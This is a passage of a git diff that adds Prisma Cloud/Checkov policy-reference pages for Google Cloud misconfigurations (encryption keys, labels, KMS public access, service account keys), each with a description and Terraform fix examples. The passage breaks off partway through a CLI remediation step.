+  location_id             = "us-central1-a"
+  alternative_location_id = "us-central1-f"
+
+  authorized_network = data.google_compute_network.redis-network.id
+
+  redis_version      = "REDIS_6_X"
+  display_name       = "Terraform Test Instance"
+  reserved_ip_range  = "192.168.0.0/28"
+  replica_count      = 5
+  read_replicas_mode = "READ_REPLICAS_ENABLED"
+
+  labels = {
+    my_key    = "my_val"
+    other_key = "other_val"
+  }
+
+  transit_encryption_mode = "SERVER_AUTHENTICATION"
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
new file mode 100644
index 000000000..166f13ed3
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc
@@ -0,0 +1,62 @@
+== GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d14ed174-3ef7-4b69-b88e-545316a0c16e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py[CKV_GCP_83]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine.
+Google Compute Engine encrypts all data at rest by default.
+Compute Engine handles and manages this encryption automatically, with no additional action required.
+When you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data.
+Only users that provide the correct key can use resources protected by a customer-supplied encryption key.
+Google does not store your keys on its servers and cannot access your protected data unless you provide the key.
+If you forget or lose your key, Google is unable to recover the key or to recover any data encrypted with that key.
+To control and manage this encryption yourself, you must provide your own encryption keys.
+We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business-critical Pub/Sub topics.
+This helps protect the Google-generated keys used to encrypt and decrypt your data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_pubsub_topic
+* *Arguments:* kms_key_name
+
+
+[source,go]
+----
+resource "google_pubsub_topic" "pass" {
+  name         = "example-topic"
+  kms_key_name = google_kms_crypto_key.crypto_key.id
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc
new file mode 100644
index 000000000..3529f6c5d
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-resources-that-suppot-labels-have-labels.adoc
@@ -0,0 +1,126 @@
+== GCP resources that support labels do not have labels
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5969c32e-6e8f-48ff-bc9e-3a60d5ddafe6
+
+|Checkov Check ID
+|CKV_GCP_CUSTOM_1
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Many different types of GCP resources support labels.
+Labels allow you to add metadata to a resource to help identify ownership, perform cost and billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names.
+While there are many ways that labels can be used, we recommend you follow a consistent labeling practice.
+View Google's recommended labeling best practices https://cloud.google.com/compute/docs/labeling-resources[here].
+
+
+[source,text]
+----
+google_active_directory_domain
+google_bigquery_dataset
+google_bigquery_job
+google_bigquery_table
+google_bigtable_instance
+google_cloud_identity_group
+google_cloudfunctions_function
+google_composer_environment
+google_compute_disk
+google_compute_image
+google_compute_instance
+google_compute_instance_from_template
+google_compute_instance_template
+google_compute_region_disk
+google_compute_snapshot
+google_dataflow_job
+google_dataproc_cluster
+google_dataproc_job
+google_dns_managed_zone
+google_eventarc_trigger
+google_filestore_instance
+google_game_services_game_server_cluster
+google_game_services_game_server_config
+google_game_services_game_server_deployment
+google_game_services_realm
+google_healthcare_consent_store
+google_healthcare_dicom_store
+google_healthcare_fhir_store
+google_healthcare_hl7_v2_store
+google_kms_crypto_key
+google_ml_engine_model
+google_monitoring_notification_channel
+google_network_management_connectivity_test
+google_notebooks_instance
+google_project
+google_pubsub_subscription
+google_pubsub_topic
+google_redis_instance
+google_secret_manager_secret
+google_spanner_instance
+google_storage_bucket
+google_tpu_node
+google_workflows_workflow
+----
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+The example below shows how to label a storage bucket in Terraform.
+The syntax is generally the same for any label-enabled resource type.
+
+
+[source,go]
+----
+resource "google_storage_bucket" "auto-expire" {
+  name          = "auto-expiring-bucket"
+  location      = "US"
+  force_destroy = true
+
++  labels = {
++    type = "prod"
++  }
+
+  lifecycle_rule {
+    condition {
+      age = 3
+    }
+
+    action {
+      type = "Delete"
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
new file mode 100644
index 000000000..31f273fde
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc
@@ -0,0 +1,70 @@
+== GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8f4dcb9b-5a0c-43ad-b323-1de833542647
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py[CKV_GCP_93]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine.
+Google Compute Engine encrypts all data at rest by default.
+Compute Engine handles and manages this encryption automatically, with no additional action required.
+When you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data.
+Only users that provide the correct key can use resources protected by a customer-supplied encryption key.
+Google does not store your keys on its servers and cannot access your protected data unless you provide the key.
+If you forget or lose your key, Google is unable to recover the key or to recover any data encrypted with that key.
+To control and manage this encryption yourself, you must provide your own encryption keys.
+We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business-critical Spanner databases.
+This helps protect the Google-generated keys used to encrypt and decrypt your data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_spanner_database
+* *Arguments:* encryption_config.kms_key_name
+
+
+[source,go]
+----
+resource "google_spanner_database" "pass" {
+  instance = google_spanner_instance.example.name
+  name     = "my-database"
+  ddl = [
+    "CREATE TABLE t1 (t1 INT64 NOT NULL,) PRIMARY KEY(t1)",
+    "CREATE TABLE t2 (t2 INT64 NOT NULL,) PRIMARY KEY(t2)",
+  ]
+  deletion_protection = false
+
+  encryption_config {
+    kms_key_name = google_kms_crypto_key.example.name
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc
new file mode 100644
index 000000000..91191345a
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-sql-database-uses-the-latest-major-version.adoc
@@ -0,0 +1,64 @@
+== GCP SQL database does not use the latest Major version
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f13dff47-149d-4a80-b8ab-8cdb6d9aee7b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py[CKV_GCP_79]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Using the latest major version for your Google Cloud Platform (GCP) SQL database can help improve the security and reliability of your database.
+Newer versions of software often include security updates and bug fixes that can help protect your database from potential threats and improve its performance.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "google_sql_database_instance" "pass" {
+  provider = google-beta
+
+  name             = "private-instance-${random_id.db_name_suffix.hex}"
+  region           = "us-central1"
+  database_version = "MYSQL_8_0"
+
+  depends_on = [google_service_networking_connection.private_vpc_connection]
+
+  settings {
+    tier = "db-f1-micro"
+    ip_configuration {
+      ipv4_enabled    = false
+      private_network = google_compute_network.private_network.id
+    }
+  }
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc
new file mode 100644
index 000000000..e03f5522c
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-subnet-has-a-private-ip-google-access.adoc
@@ -0,0 +1,59 @@
+== GCP subnet does not have a private IP Google access
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0c40a773-7046-40f9-bbc5-7fe3afe661e3
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py[CKV_GCP_74]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Enabling private IP Google access for your Google Cloud Platform (GCP) subnet can help improve the security and performance of your network.
+Private IP Google access allows resources in your subnet to access Google APIs and services over a private IP connection, rather than a public connection. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_compute_subnetwork" "pass" { + name = "example" + ip_cidr_range = "10.0.0.0/16" + network = google_compute_network.vpc.self_link + + log_config { + aggregation_interval = "INTERVAL_10_MIN" + flow_sampling = 0.5 + metadata = "INCLUDE_ALL_METADATA" + } + + private_ip_google_access = true +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc new file mode 100644 index 000000000..26184f357 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc @@ -0,0 +1,62 @@ +== GCP Vertex AI datasets do not use a Customer Manager Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 891139f5-760f-4ed7-8718-278fe9b90798 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py[CKV_GCP_92] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Vertex AI datasets that are encrypted with default KMS keys rather than with customer-managed keys. +It is a best practice to use customer-managed KMS keys to encrypt your Vertex AI dataset data. +This gives you full control over the encrypted data. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_vertex_ai_dataset +* *Arguments:* region.encryption_spec.kms_key_name + + +[source,go] +---- +resource "google_vertex_ai_dataset" "pass" { + display_name = "terraform" + metadata_schema_uri = "gs://google-cloud-aiplatform/schema/dataset/metadata/image_1.0.0.yaml" + region = "us-central1" + encryption_spec { + kms_key_name = google_kms_crypto_key.example.name + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc new file mode 100644 index 000000000..a8f6b7e92 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc @@ -0,0 +1,59 @@ +== GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c50376d2-9539-4696-b018-2a12cbf3bb34 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py[CKV_GCP_96] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies Vertex AI Metadata Stores that are encrypted with default KMS keys rather than with customer-managed keys. +It is a best practice to use customer-managed KMS keys to encrypt your Vertex AI Metadata Store data. +This gives you full control over the encrypted data. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_vertex_ai_metadata_store +* *Arguments:* region.encryption_spec.kms_key_name + + +[source,go] +---- +resource "google_vertex_ai_metadata_store" "pass" { + name = "test-store" + description = "Store to test the terraform module" + region = "us-central1" + encryption_spec { + kms_key_name = google_kms_crypto_key.example.name + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc new file mode 100644 index 000000000..a5150001f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc @@ -0,0 +1,127 @@ +== GCP KMS crypto key is anonymously accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e4c7d880-c590-481c-86cc-8c55245609b0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is recommended that the IAM policy on Cloud KMS cryptokeys restrict anonymous and/or public access. +Granting permissions to allUsers or allAuthenticatedUsers allows anyone to access the dataset. +Such access might not be desirable if sensitive data is stored at the location. +In this case, ensure that anonymous and/or public access to a Cloud KMS cryptokey is not allowed. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_crypto_key +* *Arguments:* google_kms_crypto_key_iam_member / google_kms_crypto_key_iam_binding + + +[source,go] +---- +resource "google_kms_key_ring" "keyring" { + name = "keyring-example" + location = "global" +} + + +resource "google_kms_crypto_key" "bad_key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "100000s" + lifecycle { + prevent_destroy = true + } + +} + +resource "google_kms_crypto_key_iam_member" "bad_member_1" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allUsers" +} + + +resource "google_kms_crypto_key_iam_member" "bad_member_2" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allAuthenticatedUsers" +} + + +resource "google_kms_crypto_key_iam_binding" "bad_binding_1" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- members = [ +- "allUsers", +- ] +} + + +resource "google_kms_crypto_key_iam_binding" "bad_binding_2" { + crypto_key_id = google_kms_crypto_key.bad_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- members = [ +- "allAuthenticatedUsers", +- ] +} + + +resource "google_kms_crypto_key" "good_key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id + rotation_period = "100000s" + lifecycle { + prevent_destroy = true + } + +} + +resource "google_kms_crypto_key_iam_member" "good_member" { + crypto_key_id = google_kms_crypto_key.good_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" ++ member = "user:jane@example.com" +} + + +resource "google_kms_crypto_key_iam_binding" "good_binding" { + crypto_key_id = google_kms_crypto_key.good_key.id + role = "roles/cloudkms.cryptoKeyEncrypter" ++ members = [ ++ "user:jane@example.com", ++ ] +} +---- + diff --git 
a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc new file mode 100644 index 000000000..35dd5ba5a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc @@ -0,0 +1,75 @@ +== There are not only GCP-managed service account keys for each service account + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e2becef9-8485-4a18-b9d5-803ed6bab232 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml[CKV2_GCP_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Anyone who has access to the keys will be able to access resources through the service account. +GCP-managed keys are used by Cloud Platform services such as App Engine and Compute Engine. +These keys cannot be downloaded. + +Google keeps the keys and automatically rotates them on an approximately weekly basis. +User-managed keys are created, downloadable, and managed by users. +They expire 10 years from creation. + +For user-managed keys, the user has to take ownership of key management activities, which include: + +* Key storage +* Key distribution +* Key revocation +* Key rotation +* Protecting the keys from unauthorized users +* Key recovery + +Even with key owner precautions, keys can be easily leaked by common development malpractices, such as checking keys into source code, leaving them in the Downloads directory, or accidentally leaving them on support blogs/channels. 
+ +We recommend you avoid creating user-managed service account keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_service_account, google_service_account_key +* *Arguments:* service_account_id + + +[source,go] +---- +resource "google_service_account" "account_ok" { + account_id = "dev-foo-account" +} + + +resource "google_service_account_key" "ok_key" { + service_account_id = google_service_account.account_ok.name +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc new file mode 100644 index 000000000..fee26b373 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/google-cloud-general-policies.adoc @@ -0,0 +1,159 @@ +== Google Cloud General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-general-1.adoc[GCP SQL Instances do not have SSL configured for incoming connections] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py[CKV_GCP_6] +|HIGH + + +|xref:bc-gcp-general-2.adoc[GCP SQL database instance does not have backup configuration enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py[CKV_GCP_14] +|HIGH + + +|xref:bc-gcp-general-3.adoc[GCP BigQuery dataset is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py[CKV_GCP_15] +|HIGH + + +|xref:bc-gcp-general-4.adoc[GCP KMS Symmetric key not rotating in every 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py[CKV_GCP_43] +|MEDIUM + + 
+|xref:bc-gcp-general-x.adoc[GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py[CKV_GCP_37] +|LOW + + +|xref:bc-gcp-general-y.adoc[GCP VM instance with Shielded VM features disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py[CKV_GCP_39] +|MEDIUM + + +|xref:encrypt-boot-disks-for-instances-with-cseks.adoc[Boot disks for instances do not use CSEKs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py[CKV_GCP_38] +|HIGH + + +|xref:ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py[CKV_GCP_84] +|LOW + + +|xref:ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc[GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py[CKV_GCP_81] +|LOW + + +|xref:ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py[CKV_GCP_80] +|LOW + + +|xref:ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py[CKV_GCP_85] +|LOW + + +|xref:ensure-gcp-cloud-build-workers-are-private.adoc[GCP cloud build workers are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py[CKV_GCP_86] +|LOW + + +|xref:ensure-gcp-cloud-storage-has-versioning-enabled.adoc[GCP Cloud storage does not have versioning enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py[CKV_GCP_78] +|LOW + + +|xref:ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py[CKV_GCP_90] +|LOW + + +|xref:ensure-gcp-data-fusion-instances-are-private.adoc[GCP data fusion instances are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py[CKV_GCP_87] +|LOW + + +|xref:ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc[GCP DataFusion does not have stack driver logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py[CKV_GCP_104] +|LOW + + +|xref:ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc[GCP DataFusion does not have stack driver monitoring enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py[CKV_GCP_105] +|LOW + + +|xref:ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py[CKV_GCP_91] +|LOW + + +|xref:ensure-gcp-kms-keys-are-protected-from-deletion.adoc[GCP KMS keys are not protected from deletion] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py[CKV_GCP_82] +|LOW + + +|xref:ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc[GCP Memorystore for Redis has AUTH disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py[CKV_GCP_95] +|MEDIUM + + +|xref:ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc[GCP Memorystore for Redis does not use intransit encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py[CKV_GCP_97] +|LOW + + +|xref:ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py[CKV_GCP_83] +|LOW + + +|xref:ensure-gcp-resources-that-suppot-labels-have-labels.adoc[GCP resources that support labels do not have labels] +|CKV_GCP_CUSTOM_1 +|LOW + + +|xref:ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py[CKV_GCP_93] +|LOW + + +|xref:ensure-gcp-sql-database-uses-the-latest-major-version.adoc[GCP SQL database does not use the latest Major version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py[CKV_GCP_79] 
+|LOW + + +|xref:ensure-gcp-subnet-has-a-private-ip-google-access.adoc[GCP subnet does not have a private IP Google access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py[CKV_GCP_74] +|LOW + + +|xref:ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc[GCP Vertex AI datasets do not use a Customer Manager Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py[CKV_GCP_92] +|LOW + + +|xref:ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc[GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py[CKV_GCP_96] +|LOW + + +|xref:ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc[GCP KMS crypto key is anonymously accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] +|HIGH + + +|xref:ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc[There are not only GCP-managed service account keys for each service account] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml[CKV2_GCP_3] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc new file mode 100644 index 000000000..2da9afeee --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc @@ -0,0 +1,109 @@ +== GCP VM instance configured with default service account + +=== Policy Details + +[width=45%] 
+[cols="1,1"] + +|=== +|Prisma Cloud Policy ID +| 68ab0618-0716-11eb-adc1-0242ac120002 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py[CKV_GCP_30] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The default Compute Engine service account has Editor role on the project, allowing read and write access to most Google Cloud Services. +We recommend you configure your instance to not use the default Compute Engine service account. +You should create a new service account and assign only the permissions needed by your instance. +This helps defend against compromised VM privilege escalations and prevent an attacker from gaining access to all of your project. + +NOTE: The default Compute Engine service account is named: __[PROJECT_NUMBER]__-compute@developer.gserviceaccount.com. + + +//// +=== Fix - Runtime +* GCP Console To change the policy using the GCP Console, follow these steps:* + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Click on the instance name to go to its * VM instance details* page. + +. Click * STOP*, then click * EDIT*. + +. Under the section * Service Account*, select a service account. ++ +You may first need to create a new service account. ++ +[WARNING] +==== +Do not select the default Compute Engine service account. +==== + +. Click * Save* and then click * START*. + + +* CLI Command* + + + +. Stop the instance: +---- +gcloud compute instances stop INSTANCE_NAME +---- + +. Update the instance: +---- +gcloud compute instances 